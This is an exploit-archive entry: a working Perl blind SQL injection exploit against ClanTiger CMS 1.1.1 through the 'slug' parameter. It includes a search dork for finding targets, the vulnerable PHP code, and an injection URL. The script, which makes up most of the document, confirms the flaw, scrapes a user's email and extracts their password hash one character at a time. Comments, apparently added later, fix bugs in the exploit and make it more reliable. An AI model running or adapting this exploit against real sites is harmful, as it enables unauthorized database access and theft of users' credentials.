# Title : ClanTiger <= 1.1.1 (slug) Blind SQL Injection Exploit
# Published : 2009-04-17
# Author : YEnH4ckEr
#!/usr/bin/perl
#***********************************************************************************************
#***********************************************************************************************
#** **
#** **
#** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
#** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
# [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
#** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---
#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
#** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
# [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] []
#** **
#** **
#** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O **
#** ¡PROUD TO BE SPANISH! **
#** **
#***********************************************************************************************
#***********************************************************************************************
#
#----------------------------------------------------------------------------------------------
#| (custompage.php) BLIND SQL INJECTION |
#|--------------------------------------------------------------------------------------------|
#| | CLAN TIGER CMS | |
#| CMS INFORMATION: ---------------- |
#| |
#|-->WEB: http://www.clantiger.com |
#|-->DOWNLOAD: http://www.clantiger.com/download-clan-cms |
#|-->DEMO: http://www.demo.clantiger.com/ |
#|-->CATEGORY: CMS / Portals |
#|-->DESCRIPTION: ClanTiger is a content management system specifically designed for gaming |
#| clans... |
#| |
#| CMS VULNERABILITY: |
#| |
#|-->TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default) |
#|-->DORK: "Powered by ClanTiger" |
#|-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT |
#|-->AFFECT VERSION: LAST = 1.1.1 (1.1 too) |
#|-->Discovered Bug date: 2009-04-12 |
#|-->Reported Bug date: 2009-04-12 |
#|-->Fixed bug date: Not fixed |
#|-->Info patch (????): Not fixed |
#|-->Author: YEnH4ckEr |
#|-->mail: y3nh4ck3r[at]gmail[dot]com |
#|-->WEB/BLOG: N/A |
#|-->COMMENT: A mi novia Marijose...hermano, cuñada, padres (y amigos xD) por su apoyo. |
#----------------------------------------------------------------------------------------------
#
#-----------
#BUG FILE:
#-----------
#
#Path --> [HOME_PATH]/modules/custompages.php
#
#It contains (the slug is taken straight from $_GET and handed to getBy() unchanged):
#
# function main()
# {
#
# ...
#
# $page = new CustomPage();
# $page->slug = $_GET['slug'];
# $page->getBy(array('slug'));
#
# if(!$page->id)
# {
# throw new cccException('The page you are looking for is currently unavailable. You may need to STOP! Hammertime. If School Is Out, You should try reloading this page.','Page not found');
# }
#
# $tpl->define('title',$page->title);
# $tpl->define('content',$page->content); // we allow HTML here, no safeoutput
#
# $this->pageDetails->setTitle($page->title);
# $this->pageDetails->addKeyword($page->keywords);
# $this->pageDetails->setDescription($page->description);
#
# $this->content = $tpl->publish();
# $this->display();
# }
#
#------------
#CONDITIONS:
#------------
#
#**DB_PREFIX="" (Default) -- the injected subqueries read [DB_PREFIX]members, so an
#  install that uses a table prefix needs it passed as the 7th argument of the script
#
# maybe: db, db_clan, ...
#
#**Exist a custompage
#
#**magic_quotes_gpc=Off (PHP directive; when On, the quote in the slug is backslash-escaped and the injection fails)
#
#---------------------------------------
#PROOF OF CONCEPT (BLIND SQL INJECTION):
#---------------------------------------
#
#[HOME_PATH]/modules/custompages.php?slug=the_custom_page' [BLIND SQL INJECTION]
#(the Perl exploit below reaches the same handler through the front controller: index.php?module=custompages&slug=...)
#
#---------
#EXAMPLE:
#---------
#
#[HOME_PATH]/modules/custompages.php?slug=the_custom_page'%20AND%20((SELECT%20length(username)%20from%20members%20WHERE%20id=1)=5)%20/*
#
#Result: if the custom page renders normally the condition was true and the user's username has 5 characters
#(maybe = admin? :P); if the "Page not found" error thrown by custompages.php comes back instead, it was false.
#That true/false difference is the boolean oracle every blind probe in the script relies on.
#
#*******************************************************************
# SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!
#*******************************************************************
#-------------------------------------------------------------------
#*******************************************************************
# GREETZ TO: JosS and all spanish Hack3Rs community!
#*******************************************************************
#
#-------------------EOF---------------------------------->>>ENJOY IT!
#
use LWP::UserAgent;
use HTML::TreeBuilder 2.96;
#Subroutines
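# Clear the screen; on Windows also set the console title and colour.
# Platform test: the original used index(lc($^O), "win") != -1, which is
# also true for "darwin" (macOS) and "cygwin", so those platforms got the
# cmd.exe commands (cls/title/color) instead of clear(1). The Win32 perl
# platform string is "MSWin32"; match that instead. The command strings are
# constants, so running them through the shell is harmless here.
sub lw
{
    if ($^O =~ /^MSWin/) {
        system("cls");
        system("title Clan Tiger CMS (module custompages.php) BLIND SQL Injection Exploit");
        system("color 02");
    }
    else {
        system("clear");
    }
}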
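# Perform one GET with the operator's session cookies and return the whole
# response (status line, headers AND body) as one string.
#   $_[0]  CCC_UID cookie value
#   $_[1]  CCC_CODE cookie value
#   $_[2]  full URL to fetch
# Every blind probe goes through here, so a target that stops answering
# would stall the extraction for LWP's default timeout (180 s) per probe;
# an explicit 30 s limit is set instead. Note that the URLs built by main
# are plain http://, so the cookies travel in clear text on every request.
# Callers pattern-match the returned string; because headers are included,
# a match can in principle hit a header rather than the page body.
sub request {
    my ($uid, $code, $url) = @_;
    my $cookie = "CCC_LANG=en;" . " CCC_UID=" . $uid . "; CCC_CODE=" . $code . ";";
    my $ua = LWP::UserAgent->new(timeout => 30);
    $ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    my $req = HTTP::Request->new(GET => $url);
    $req->header(cookie => $cookie);
    return $ua->request($req)->as_string;
}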
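# Print the usage text; main calls this when fewer than five positional
# arguments are supplied. The "\n"/"\t" escapes and the escaped quotes in the
# last example line were stripped in the archived copy (the bare "" would
# not even compile inside a double-quoted string); they are restored here.
sub helper {
    print "\n\t[**] Clan Tiger CMS - BLIND SQL Injection Exploit\n";
    print "\t[??] USAGE MODE: [??]\n";
    print "\t[**] perl $0 [HOST] [PATH] [uid] [code] [slug] [id] [DB_PREFIX]\n";
    print "\t[**] [HOST]: Web attacked.\n";
    print "\t[**] [PATH]: Home Path.\n";
    print "\t[**] [uid]: The CCC_UID cookie.\n";
    print "\t[**] [code]: The CCC_CODE cookie.\n";
    print "\t[**] [slug]: Title custompage.\n";
    print "\t[**] [id]: Exploiting id user. Default: 1 (**optional)\n";
    print "\t[**] [DB_PREFIX]: Global var needed. Default: null (**optional)\n";
    print "\t[**] Example: perl $0 www.example.es Clan-tiger-111 f717716... \n";
    print "\t[**] ...2e1a50db06c0f2fe8804885ac2c01390 namecustompage 1 \"\"\n";
}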
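# Scrape the target user's e-mail address from the profile page (one page
# load instead of one blind probe per character).
#   $_[0] CCC_UID cookie   $_[1] CCC_CODE cookie   $_[2] profile-page URL
# Returns the text of the first <td style="width: 70%"> cell, or "" with a
# warning when the page has no such cell -- the original called ->as_text on
# an undefined value and died with a bare "Can't call method" message.
# The original also placed $root->delete() after the return statement, so
# the HTML::TreeBuilder tree (self-referential; it must be deleted
# explicitly) was never freed; it is now released before returning.
sub mail{
    my ($uid, $code, $url) = @_;
    my $page = request($uid, $code, $url);
    my $root = HTML::TreeBuilder->new_from_content($page);
    my $cell = $root->look_down('_tag', 'td', 'style', 'width: 70%');
    print "\t-----------------------------------------------------------------\n";
    print "\tMail captured!.Getting password hash. Wait for a moment...\n";
    print "\t-----------------------------------------------------------------\n";
    my $address = '';
    if (defined $cell) {
        $address = $cell->as_text();
    }
    else {
        print "\tWarning: no <td style=\"width: 70%\"> cell in the profile page; e-mail not found.\n";
    }
    $root->delete();
    return $address;
}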
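# Extract the target user's password hash by boolean-based blind SQL
# injection through the custompage slug.
#   $_[0] DB_PREFIX      $_[1] user id       $_[2] CCC_UID cookie
#   $_[3] CCC_CODE cookie
#   $_[4] base URL ending in "&slug=<slug>" (what main builds)
#   $_[5] (optional) the slug whose presence in a response marks a "true"
#         probe; when omitted it is recovered from the slug= parameter of
#         $_[4]. main, as archived, passes only five arguments.
# One request per candidate: position $pos (1..32) of the password column
# is compared with ascii code $chr via substring()/ascii(); if the custom
# page renders (slug present in the response) the guess was right. The
# candidate set is 0-9 followed by a-z (ascii 48-57, then 97-126), i.e. the
# hash is assumed to be a 32-character lower-case hex digest (MD5); if the
# application stores something else this returns nothing useful.
# Fixes against the archived original:
#  * the response check `$output =~ (/<title>/.$custompage)` ran /<title>/
#    against $_ and concatenated its result with $custompage -- which inside
#    this sub is the package global, not the `my $custompage` main declares
#    further down -- so the effective pattern was empty or the raw slug used
#    as a regex. It is now an explicit literal match on the slug.
#  * the loop leaves with $chr == 127, but the failure test was `$i > 127`,
#    so an exhausted search returned an empty or partial hash silently.
#  * $pass was a package global that accumulated across calls.
sub password {
    my ($prefix, $id, $uid, $code, $base) = @_;
    my $slug = $_[5];
    if (!defined $slug || $slug eq '') {
        ($slug) = ($base =~ /[?&]slug=([^&]*)\z/);
    }
    if (!defined $slug || $slug eq '') {
        print "\tFatal error: no slug to recognise a 'true' response with.\n";
        exit(1);
    }
    my $hash = '';
    my $pos = 1;
    my $chr = 48;                         # '0'
    while ($pos <= 32 && $chr <= 126) {
        my $probe = $base
            . "'+AND+ascii(substring((SELECT+password+FROM+" . $prefix
            . "members+WHERE+id=" . $id . ")," . $pos . ",1))=" . $chr . "+/*";
        my $output = request($uid, $code, $probe);
        if ($output =~ /\Q$slug\E/) {
            $hash .= chr($chr);
            $pos++;
            $chr = 47;                    # next position restarts at '0' after the increment below
        }
        if ($chr == 57) {                 # after '9' jump straight to 'a'
            $chr = 96;
        }
        $chr++;
    }
    # Only two ways out of the loop: all 32 positions found, or the
    # candidate set exhausted for the current position.
    if ($hash eq '') {
        print "\t-----------------------------------------------------------------\n";
        print("\tEXPLOIT FAILED!\n");
        print("\tFatal error: Datas doesn't find!\n");
        print "\t-----------------------------------------------------------------\n";
        exit(1);
    }
    if ($pos <= 32) {
        print "\tWarning: candidate set exhausted after " . length($hash)
            . " characters; the hash below is incomplete.\n";
    }
    return $hash;
}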
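#Main
# Flow: banner -> argument check -> probes that establish (1) the session
# cookies are accepted, (2) the custom page exists, (3) the slug is
# injectable (a true AND a false condition behave differently) and the
# target user row exists under DB_PREFIX -> scrape the e-mail from the
# profile page -> blind-extract the password hash.
#
# Every probe is a plain-HTTP GET carrying the operator's own CCC_UID /
# CCC_CODE session cookies (the URLs are built with "http://"), so the
# cookies travel in clear text and each probe, injection string included,
# lands in the target's access log.
#
# Changes against the archived copy: the "\n"/"\t" escapes and the "<\/div>"
# closers in the regexes were lost by the archive and are restored; @ARGV is
# validated before anything is built from it; the slug is matched as a
# quoted literal (the original `(/<title>/.$custompage)` ran /<title>/
# against $_ and then used the bare slug as a regex); a 1=2 probe guards
# against a false positive from a page that ignores the slug; the slug is
# handed to password() explicitly; a successful run exits 0 instead of 1.
lw();
print "\t\t#########################################################\n\n";
print "\t\t#########################################################\n\n";
print "\t\t## Clan Tiger CMS - BLIND SQL Injection Exploit ##\n\n";
print "\t\t## ++Conditions: Need a register user,a custompage ##\n\n";
print "\t\t## and DB_PREFIX (default:null) ##\n\n";
print "\t\t## Author: Y3nh4ck3r ##\n\n";
print "\t\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n";
print "\t\t## Proud to be Spanish! ##\n\n";
print "\t\t#########################################################\n\n";
print "\t\t#########################################################\n\n";
#Check all variables needed before using any of them
if (scalar(@ARGV) <= 4)
{
    helper();
    exit(1);
}
#Init variables
my ($host, $path, $uid, $code, $custompage) = @ARGV[0 .. 4];
#Id-user is optional.Default:1 (an explicit "0" is kept, unlike the original's !$ARGV[5] test)
my $idhack = (defined $ARGV[5] && length $ARGV[5]) ? $ARGV[5] : "1";
my $db_prefix = (defined $ARGV[6] && length $ARGV[6]) ? $ARGV[6] : "";
# The id is interpolated unquoted into the injected SELECT; anything other
# than digits would only break the probe query, so reject it up front.
if ($idhack !~ /^\d+$/) {
    print "\t[id] must be a non-negative integer, got '" . $idhack . "'\n";
    exit(1);
}
#Build the uri
my $finalhost = "http://" . $host . "/" . $path . "/index.php?module=custompages&slug=";
$finalhost = $finalhost . $custompage;
# A "true" probe renders the custom page (its slug shows up in the
# response); a "false" probe yields the "Page not found" error instead.
my $slug_re = qr/\Q$custompage\E/;
#Testing
my $output = request($uid, $code, $finalhost);
if ($output =~ /<div class="title">Access denied<\/div>/)
{
    print "\t-----------------------------------------------------------------\n";
    print "\tYour credentials are not correct! This exploits need login.\n";
    print "\tOptions: [your-id-user],[your-password] incorrect.\n";
    print "\tExploit failed! No luck!\n";
    print "\t-----------------------------------------------------------------\n";
    exit(1);
}
if ($output =~ /<div class="title">Page not found<\/div>/)
{
    print "\t-----------------------------------------------------------------\n";
    print "\tCustom page doesn't exist! Maybe no there on this server!\n";
    print "\tOption: [slug-get-var] incorrect.\n";
    print "\tExploit failed! No luck!\n";
    print "\t-----------------------------------------------------------------\n";
    exit(1);
}
if ($output =~ $slug_re)
{
    print "\t-----------------------------------------------------------------\n";
    print "\tThis Web could be vulnerable!\n";
    print "\tThe custompage exists!\n";
    print "\tTesting Blind SQL Injection...\n";
    print "\t-----------------------------------------------------------------\n";
}
else {
    print "\t-----------------------------------------------------------------\n";
    print "\tCustompage doesn't exist!\n";
    print "\tEXPLOIT FAILED!\n";
    print "\t-----------------------------------------------------------------\n";
    exit(1);
}
#Test blind sql injection: a true condition must render the page ...
my $probe = $finalhost . "'+AND+1=1+/*";
$output = request($uid, $code, $probe);
my $true_renders = ($output =~ $slug_re) ? 1 : 0;
# ... and a false one must not, otherwise the slug is simply being ignored
# (or echoed) and the "true" result proves nothing.
$probe = $finalhost . "'+AND+1=2+/*";
$output = request($uid, $code, $probe);
my $false_renders = ($output =~ $slug_re) ? 1 : 0;
if ($true_renders && !$false_renders)
{
    print "\t-----------------------------------------------------------------\n";
    print "\tThis Web is really vulnerable!\n";
    print "\tTested Blind SQL Injection.\n";
    print "\tChecking id user and DB_PREFIX null...\n";
    print "\t-----------------------------------------------------------------\n";
}
else {
    print "\t-----------------------------------------------------------------\n";
    print "\tThis Web is not vulnerable (Maybe patched)!\n";
    print "\tEXPLOIT FAILED!\n";
    print "\t-----------------------------------------------------------------\n";
    exit(1);
}
#Test if user exists and DB_PREFIX
$probe = $finalhost . "'+AND+(SELECT+COUNT(*)+from+" . $db_prefix . "members+WHERE+id=" . $idhack . ")+/*";
$output = request($uid, $code, $probe);
if ($output =~ $slug_re)
{
    print "\t-----------------------------------------------------------------\n";
    print "\tOK...The user exists and DB_PREFIX is '" . $db_prefix . "'!\n";
    print "\tStarting exploit...\n";
    print "\t-----------------------------------------------------------------\n";
    print "\tWait several minutes...\n";
    print "\t-----------------------------------------------------------------\n";
}
else {
    print "\t-----------------------------------------------------------------\n";
    print "\tUser doesn't exists or DB_PREFIX not '" . $db_prefix . "'\n";
    print "\tEXPLOIT FAILED!\n";
    print "\t-----------------------------------------------------------------\n";
    exit(1);
}
#OK, now we get the mail user from web
#i got it from blind sql but this method is faster and reduce time of injection
#First email...
my $hostmail = "http://" . $host . "/" . $path . "/index.php?module=profiles&action=view&id=" . $idhack;
my $mail = mail($uid, $code, $hostmail);
# The slug is passed explicitly; the archived password() read a global
# that this file-scoped `my $custompage` never populated.
my $passhash = password($db_prefix, $idhack, $uid, $code, $finalhost, $custompage);
print "\n\t\t*************************************************\n";
print "\t\t**** EXPLOIT EXECUTED (CREDENTIALS STEALER) ****\n";
print "\t\t*************************************************\n\n";
print "\t\tUser-id:" . $idhack . "\n";
print "\t\tUser-email:" . $mail . "\n";
print "\t\tUser-password(hash):" . $passhash . "\n\n";
print "\n\t\t----------------------FINISH!--------------------\n\n";
print "\t\t---------------Thanks to: y3hn4ck3r--------------\n\n";
print "\t\t------------------------EOF----------------------\n\n";
# Success: exit status 0 so a wrapper can tell a completed run from the
# exit(1) failures above.
exit(0);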
#Ok...all job done